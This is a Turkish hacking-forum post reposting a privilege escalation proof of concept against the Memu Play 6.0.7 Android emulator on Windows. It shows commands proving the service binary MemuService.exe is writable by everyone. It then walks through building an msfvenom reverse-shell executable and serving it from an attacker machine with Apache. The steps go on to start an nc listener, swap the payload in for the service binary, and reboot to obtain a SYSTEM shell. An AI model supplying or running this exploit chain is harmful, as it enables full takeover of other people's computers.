Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...




Memu Play 6.0.7 - Privilege Escalation (PoC)

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 24-02-2019 15:05   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110


Memu Play 6.0.7 - Privilege Escalation (PoC)



# Exploit Title/Exploit Başlığı: Memu Play 6.0.7 - Privilege Escalation (PoC)
# Date/Tarih: 20/02/2019
# Exploit Author/Exploit Yazarı: Alejandra SA!nchez
# Vendor Homepage/Yapımcı Websitesi: https://www.memuplay.com/
# Software Link/Yazılım Linki: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Version/Versiyon: 6.0.7
# Tested on /Test Edilen Sistemler : Windows 10 / Windows 7


#Prerequisites / Ön Şartlar:
Yeniden bağlatma özelliğine sahip yerel ağda düşük ayrıcalıklı erişim.

# Details/Ayrıntılar:
Varsayılan kullanıcıların ESM folders/files için aşağıdaki gibi değiştirme yetkileri var.
Düşük bir ayrıcalıklı hesap, bu aynı yolda bulunan MemuService.exe dosyasını yeniden adlandırabilir ve yerel sistem olarak çalışan hizmet nedeniyle sistem seviyesinde ayrıcalıklarla bu dosyayı değiştirip saldırı dosyasını yükleyebilir.


C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone: (I)(F)
BUILTIN\Administrators: (I)(F)
BUILTIN\Users: (I)(F)
NT AUTHORITY\SYSTEM: (I)(F)


Successfully processed 1 files; Failed processing 0 files


C:\>sc qc MEmuSVC
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MEmuSVC
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
LOAD_ORDER_GROUP :
TAG : 0



# Proof of Concept/Kanıt

1. Saldırılan makine üzerinde malicious .exe oluşturun.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe >
/var/www/html/MemuService.exe
2. Dinleyiciyi kurun ve Apache nin makinede çalıştığına emin olun.
nc -lvp 443
service apache2 start
3. malicious .exe yi kurbanın makinesine indirin.
Tarayıcıda http://192.168.1.130/MemuService.exe yazın ve indirin.
4. malicious .exe üzerine yazın ve kopyalayın.
Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
5. Kurbanın makinesini yeniden başlatın.

6. Reserve Shell makinede açılacak .
C:\Windows\system32>whoami
whoami
nt authority\system




Exploit Linki : https://cxsecurity.com/issue/WLB-2019020233



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau